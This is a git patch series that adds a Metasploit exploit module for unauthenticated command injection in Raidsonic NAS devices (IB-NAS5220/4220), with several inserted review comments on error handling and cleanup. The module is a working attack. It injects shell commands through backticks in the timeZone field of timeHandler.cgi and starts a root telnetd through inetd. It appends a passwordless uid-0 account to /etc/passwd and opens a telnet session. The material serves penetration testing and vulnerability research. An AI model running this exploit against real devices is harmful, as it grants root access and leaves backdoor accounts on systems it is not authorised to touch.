From 62e3c011906912abd5821354d8ff550b6946243a Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Fri, 2 Aug 2013 21:04:19 +0200 Subject: [PATCH 01/14] raidsonic nas - command execution --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 208 ++++++++++++++++++ 1 file changed, 208 insertions(+) create mode 100644 modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb new file mode 100644 index 0000000000..f693df1ac4 --- /dev/null +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb 
@@ -0,0 +1,208 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::CommandShell + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Raidsonic NAS Devices Unauthenticated Remote Command Execution', + 'Description' => %q{ + Different Raidsonic NAS devices are vulnerable to OS command injection via the web + interface. The vulnerability exists in timeHandler.cgi, which is accessible without + authentication. This module has been tested with the versions IB-NAS5220 and + IB-NAS4220. + Two target are included, first to start a telnetd service and establish a session over + it and second to run commands via the CMD target. + }, + 'Author' => + [ + 'Michael Messner ', # Vulnerability discovery and Metasploit module + 'juan vazquez' # minor help with msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'OSVDB', '90221' ], + [ 'EDB', '24499' ], + [ 'BID', '57958' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-010' ] + ], + 'DisclosureDate' => 'Feb 04 2013', + 'Privileged' => true, + 'Platform' => ['linux','unix'], + 'Payload' => + { + 'DisableNops' => true, + }, + 'Targets' => + [ + [ 'CMD', #all devices + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix' + } + ], + [ 'Telnet', #all devices - default target + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix' + } + ], + ], + 'DefaultTarget' => 1 + )) + end + + def exploit + if target.name =~ /CMD/ + exploit_cmd + else + exploit_telnet + end + end + + def exploit_cmd + if not (datastore['CMD']) + fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") + end + print_status("#{rhost}:#{rport} - Sending 
remote command") + res = request(payload.encoded) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end + + print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n") + + return + end + + def exploit_telnet + telnetport = rand(65535) + + response_pattern = "\ /tmp/inetd.conf" + cmd = Rex::Text.uri_encode(cmd) + vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") + + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{response_pattern}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end + + #third request + cmd = "/usr/sbin/inetd /tmp/inetd.conf" + cmd = Rex::Text.uri_encode(cmd) + vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") + + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{response_pattern}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end + + #fourth request + user = rand_text_alpha(6) + cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd" + cmd = Rex::Text.uri_encode(cmd) + vprint_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") + + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{response_pattern}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end + begin + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) + + if sock + print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") + 
add_socket(sock) + else + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") + end + + print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" + auth_info = { + :host => rhost, + :port => telnetport, + :sname => 'telnet', + :user => user, + :pass => "", + :source_type => "exploit", + :active => true + } + report_auth_info(auth_info) + merge_me = { + 'USERPASS_FILE' => nil, + 'USER_FILE' => nil, + 'PASS_FILE' => nil, + 'USERNAME' => user, + 'PASSWORD' => nil + } + start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) + rescue + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") + end + return + end + + def request(cmd) + + uri = '/cgi/time/timeHandler.cgi' + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + #not working without setting encode_params to false! + 'encode_params' => false, + 'vars_post' => { + "month" => "#{rand(12)}", + "date" => "#{rand(30)}", + "year" => "20#{rand(99)}", + "hour" => "#{rand(12)}", + "minute" => "#{rand(60)}", + "ampm" => "PM", + "timeZone" => "Amsterdam`#{cmd}`", + "ntp_type" => "default", + "ntpServer" => "none", + "old_date" => " 1 12007", + "old_time" => "1210", + "old_timeZone" => "Amsterdam", + "renew" => "0" + } + }) + return res + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return nil + end + end +end From b8ed364cb89758b8d17183bee0276ca5912feb39 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 3 Aug 2013 15:07:10 +0200 Subject: [PATCH 02/14] telnet user working --- .../exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index f693df1ac4..074425f7f9 100644 
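Review bot: The bare `rescue` that closes exploit_telnet's begin block catches every StandardError raised inside it — including, if Msf::Exploit::Failed is a StandardError as I believe, the `fail_with` already raised for a nil socket, and any Rex socket or session error — and replaces it with the generic 'Backdoor service has not been spawned!!!' text, so the real cause is never shown; this rescue survives unchanged through the later commits of the series. Narrow it and keep the cause: `rescue ::Rex::ConnectionError, ::Timeout::Error => e` with `fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Telnet handling failed: #{e.message}")`. The fourth request appends a passwordless uid-0 entry to /etc/passwd that nothing in the module removes or records, so the Description should state that this account persists on the device after the session ends and must be cleaned up by the tester. `telnetport = rand(65535)` can also yield 0, a port inetd cannot bind; `rand(1024..65535)` avoids it.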
--- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -75,10 +75,11 @@ class Metasploit3 < Msf::Exploit::Remote if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end + response_pattern = "\ user, 'PASSWORD' => nil } + sock.put(user) + sock.put("\r\n") start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") From 34134b2e112cf0ed6de0842c7ff08c81594943d8 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sun, 4 Aug 2013 14:45:55 +0200 Subject: [PATCH 03/14] feedback included --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 25 ++++++++++--------- 1 file changed, 13 insertions(+), 12 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 074425f7f9..e5da1f9993 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -12,12 +12,13 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CommandShell + include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Raidsonic NAS Devices Unauthenticated Remote Command Execution', 'Description' => %q{ - Different Raidsonic NAS devices are vulnerable to OS command injection via the web + Different Raidsonic NAS devices are vulnerable to OS command injection via the web interface. The vulnerability exists in timeHandler.cgi, which is accessible without authentication. This module has been tested with the versions IB-NAS5220 and IB-NAS4220. 
@@ -64,6 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit + @response_pattern = "\ /tmp/inetd.conf" + inetd_cfg = rand_text_alpha(8) + cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") + register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{response_pattern}/) + if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end #third request - cmd = "/usr/sbin/inetd /tmp/inetd.conf" + cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{response_pattern}/) + if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end @@ -136,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote res = request(cmd) #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{response_pattern}/) + if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end begin From 2efc2a79bfdeb5241d4842982b8c6820de41c6cf Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 5 Aug 2013 21:41:28 +0200 Subject: [PATCH 04/14] fail with --- .../exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) 
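Review bot: `res.body !~ /#{@response_pattern}/` interpolates the pattern string into a regex unescaped (its value is not legible in this hunk), so any metacharacter in it changes the match; if the intent is a literal substring test, `res.body.include?(@response_pattern)` or `Regexp.new(Regexp.escape(@response_pattern))` says so. The same `!res or res.code != 200 or res.body !~ ...` guard plus `fail_with` is repeated for each request here and in the @@ -136 hunk; a `command_executed?(res)` predicate (or folding the check into `request`) would remove the duplication. `register_file_for_cleanup("/tmp/#{inetd_cfg}")` is called before the request is sent, so the cleanup list may name a file that was never created — harmless, but clearer after the success check. exploit_telnet starts outside this hunk.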
diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index e5da1f9993..997b435ca6 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -205,8 +205,7 @@ class Metasploit3 < Msf::Exploit::Remote }) return res rescue ::Rex::ConnectionError - vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") - return nil + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") end end end From 885417c9d9aff4efd690b54cde28db2c40ffab21 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Tue, 6 Aug 2013 15:11:54 +0200 Subject: [PATCH 05/14] removing config file from target --- .../exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 997b435ca6..f8f37a24fa 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -110,7 +110,6 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") - register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -170,6 +169,8 @@ class Metasploit3 < Msf::Exploit::Remote } sock.put(user) sock.put("\r\n") + sock.put("rm /tmp/#{inetd_cfg}") + sock.put("\r\n") start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") 
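Review bot: The `rescue ::Rex::ConnectionError` branch of `request` now raises via `fail_with` but discards the exception, so the operator cannot tell a refused connection from a timeout; capture it with `rescue ::Rex::ConnectionError => e` and report `"#{rhost}:#{rport} - Could not connect to the webservice: #{e.message}"`. Callers still guard on `!res`, which remains useful because send_request_cgi can itself return nil when no response arrives, so that check should stay. The body of `request` begins outside this hunk.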
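Review bot: Dropping `register_file_for_cleanup("/tmp/#{inetd_cfg}")` in favour of `sock.put("rm /tmp/#{inetd_cfg}")` weakens the cleanup: the rm is written to the telnet socket right after the username with no wait for the login to complete and no check that it ran, and it is only sent at all if the telnet path succeeds, so any failure before that point leaves the inetd config behind. Keep the `register_file_for_cleanup` call (FileDropper was included for exactly this in the previous commit and, as far as these hunks show, is now unused) and treat the socket-side rm as best effort. The surrounding exploit method starts and ends outside the hunk.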
From 6b872403230b6ea91fa07e97f4a2632ce30cb4db Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Wed, 14 Aug 2013 16:51:09 +0200 Subject: [PATCH 06/14] thx to juan ... session stuff looks better --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 119 +++++++++--------- 1 file changed, 63 insertions(+), 56 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index f8f37a24fa..5c4c24dd8c 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb 
@@ -41,63 +41,57 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 04 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], - 'Payload' => + 'Payload' => { - 'DisableNops' => true, + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'Targets' => [ - [ 'CMD', #all devices - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], - [ 'Telnet', #all devices - default target - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], + [ 'Automatic', { } ], ], - 'DefaultTarget' => 1 + 'DefaultTarget' => 0 )) + + register_options( + [ + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ false, 'Password to login with', 'admin']), + + ], self.class) + + register_advanced_options( + [ + OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), + OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) + ], self.class) + end + + def tel_timeout + (datastore['TelnetTimeout'] || 10).to_i + end + + def banner_timeout + (datastore['TelnetBannerTimeout'] || 25).to_i end def exploit @response_pattern = "\ /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") + print_status("#{rhost}:#{rport} - sending second request - configure inetd") + register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed 
@@ -120,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote #third request cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") + print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -132,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote user = rand_text_alpha(6) cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") + print_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -140,12 +135,10 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end begin + print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) - if sock - print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") - add_socket(sock) - else + if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end 
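Review bot: The new `if sock.nil?` check after `Rex::Socket.create_tcp` is, as far as I know, unreachable: create_tcp raises a Rex::ConnectionError subclass when the connect fails rather than returning nil, so a failed connect skips this branch and lands in the bare `rescue` at the end of the block with the same message. Wrap the connect explicitly, `rescue ::Rex::ConnectionError => e` and `fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned: #{e.message}")`, so the cause is reported. The same check reappears in the patch 07 hunk at @@ -140. The enclosing exploit method begins and ends outside this hunk.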
@@ -160,18 +153,17 @@ class Metasploit3 < Msf::Exploit::Remote :active => true } report_auth_info(auth_info) - merge_me = { - 'USERPASS_FILE' => nil, - 'USER_FILE' => nil, - 'PASS_FILE' => nil, - 'USERNAME' => user, - 'PASSWORD' => nil - } + prompt = negotiate_telnet(sock) + if prompt.nil? + sock.close + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") + else + print_good("#{rhost}:#{rport} - Telnet session successfully established...") + end + sock.put(user) sock.put("\r\n") - sock.put("rm /tmp/#{inetd_cfg}") - sock.put("\r\n") - start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) + handler(sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end @@ -206,7 +198,22 @@ class Metasploit3 < Msf::Exploit::Remote }) return res rescue ::Rex::ConnectionError - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + end + end + def negotiate_telnet(sock) + begin + Timeout.timeout(banner_timeout) do + while(true) + data = sock.get_once(-1, tel_timeout) + return nil if not data or data.length == 0 + if data =~ /login/ + return true + end + end + end + rescue ::Timeout::Error + return nil end end end From 90aec6cff5d7a6b10414ffb3012b7a44b459c48e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 14 Aug 2013 13:38:51 -0500 Subject: [PATCH 07/14] Fix telnet negotiation for the raidsonic case --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 130 ++++++++++-------- 1 file changed, 72 insertions(+), 58 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index f8f37a24fa..02adb00608 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb 
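Review bot: `negotiate_telnet` returns only true or nil while its caller stores the result as `prompt` and tests `prompt.nil?`, so the name promises prompt text that is never delivered; either return the matching `data` or rename the local to something like `logged_in`. The read loop is written in a C style — `while(true)` and `return nil if not data or data.length == 0` — where `loop do` and `return nil if data.nil? || data.empty?` are the Ruby forms, and `if data =~ /login/ ... return true ... end` collapses to `return true if data =~ /login/`; this loop is carried unchanged into the read_telnet helper of the later commits. Each `get_once` chunk is tested on its own, so a prompt split across two reads would be missed; accumulating into a buffer before matching would be more robust, though whether the device ever splits it is not visible here.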
+++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -41,63 +41,57 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 04 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], - 'Payload' => + 'Payload' => { - 'DisableNops' => true, + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'Targets' => [ - [ 'CMD', #all devices - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], - [ 'Telnet', #all devices - default target - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], + [ 'Automatic', { } ], ], - 'DefaultTarget' => 1 + 'DefaultTarget' => 0 )) + + register_options( + [ + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ false, 'Password to login with', 'admin']), + + ], self.class) + + register_advanced_options( + [ + OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), + OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) + ], self.class) + end + + def tel_timeout + (datastore['TelnetTimeout'] || 10).to_i + end + + def banner_timeout + (datastore['TelnetBannerTimeout'] || 25).to_i end def exploit @response_pattern = "\ /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") + print_status("#{rhost}:#{rport} - sending second request - configure inetd") + register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed 
@@ -120,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote #third request cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") + print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -132,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote user = rand_text_alpha(6) cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") + print_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -140,12 +135,10 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end begin + print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) - if sock - print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") - add_socket(sock) - else + if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end 
@@ -160,18 +153,15 @@ class Metasploit3 < Msf::Exploit::Remote :active => true } report_auth_info(auth_info) - merge_me = { - 'USERPASS_FILE' => nil, - 'USER_FILE' => nil, - 'PASS_FILE' => nil, - 'USERNAME' => user, - 'PASSWORD' => nil - } - sock.put(user) - sock.put("\r\n") - sock.put("rm /tmp/#{inetd_cfg}") - sock.put("\r\n") - start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) + prompt = negotiate_telnet(sock) + if prompt.nil? + sock.close + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") + else + print_good("#{rhost}:#{rport} - Telnet session successfully established...") + end + + handler(sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end @@ -206,7 +196,31 @@ class Metasploit3 < Msf::Exploit::Remote }) return res rescue ::Rex::ConnectionError - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + end + end + + def negotiate_telnet(sock) + login = read_telnet(sock, "login: $") + if login + sock.put("#{user}\r\n") + end + return read_telnet(sock, "> $") + end + + def read_telnet(sock, pattern) + begin + Timeout.timeout(banner_timeout) do + while(true) + data = sock.get_once(-1, tel_timeout) + return nil if not data or data.length == 0 + if data =~ /#{pattern}/ + return true + end + end + end + rescue ::Timeout::Error + return nil end end end From 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 14 Aug 2013 13:50:08 -0500 Subject: [PATCH 08/14] Beautify --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 61 +++++++------------ 1 file changed, 23 insertions(+), 38 deletions(-) 
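Review bot: Inside the new `negotiate_telnet`, `sock.put("#{user}\r\n")` references `user`, but `user` is a local variable of `exploit` (the @@ -132 hunk assigns it with `rand_text_alpha(6)`) and is not visible here, so this line raises NameError unless some mixin happens to define a `user` method, in which case the wrong name is sent. Pass it explicitly — `def negotiate_telnet(sock, user)` and `prompt = negotiate_telnet(sock, user)` in the caller — rather than relying on shared state. `read_telnet` uses `banner_timeout` for both the login and the shell prompt even though the option is described as the initial-banner wait; a brief comment on why the longer value is reused for the second read would help.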
diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 02adb00608..90a2437fd5 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -14,6 +14,8 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Auxiliary::CommandShell include Msf::Exploit::FileDropper + RESPONSE_PATTERN = "\ 'Raidsonic NAS Devices Unauthenticated Remote Command Execution', @@ -22,8 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote interface. The vulnerability exists in timeHandler.cgi, which is accessible without authentication. This module has been tested with the versions IB-NAS5220 and IB-NAS4220. - Two target are included, first to start a telnetd service and establish a session over - it and second to run commands via the CMD target. }, 'Author' => [ @@ -79,14 +79,9 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - @response_pattern = "\ /tmp/#{inetd_cfg}" + cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending second request - configure inetd") register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/) + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end 
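Review bot: `RESPONSE_PATTERN` is a mutable String constant; freeze it (`RESPONSE_PATTERN = "...".freeze`) so an accidental in-place edit cannot silently change every later match. It is still interpolated straight into a regex at each use, so if it contains metacharacters the match is not literal; `Regexp.new(Regexp.escape(RESPONSE_PATTERN))` or `res.body.include?(RESPONSE_PATTERN)` would make the intent explicit. The value itself is not legible in this hunk.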
@@ -119,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote res = request(cmd) #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/) + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end @@ -131,28 +126,18 @@ class Metasploit3 < Msf::Exploit::Remote res = request(cmd) #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/) + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end begin print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i }) if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end - print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" - auth_info = { - :host => rhost, - :port => telnetport, - :sname => 'telnet', - :user => user, - :pass => "", - :source_type => "exploit", - :active => true - } - report_auth_info(auth_info) + print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") prompt = negotiate_telnet(sock) if prompt.nil? sock.close 
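Review bot: Removing `report_auth_info(auth_info)` means the uid-0 account that the fourth request appends to /etc/passwd is no longer recorded anywhere — the only trace is a status line on the console — while nothing in the module deletes it. Keep the credential report (with the random `user` and the telnet port) so the engagement record shows what was left on the device and can be removed afterwards. exploit starts outside this hunk.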
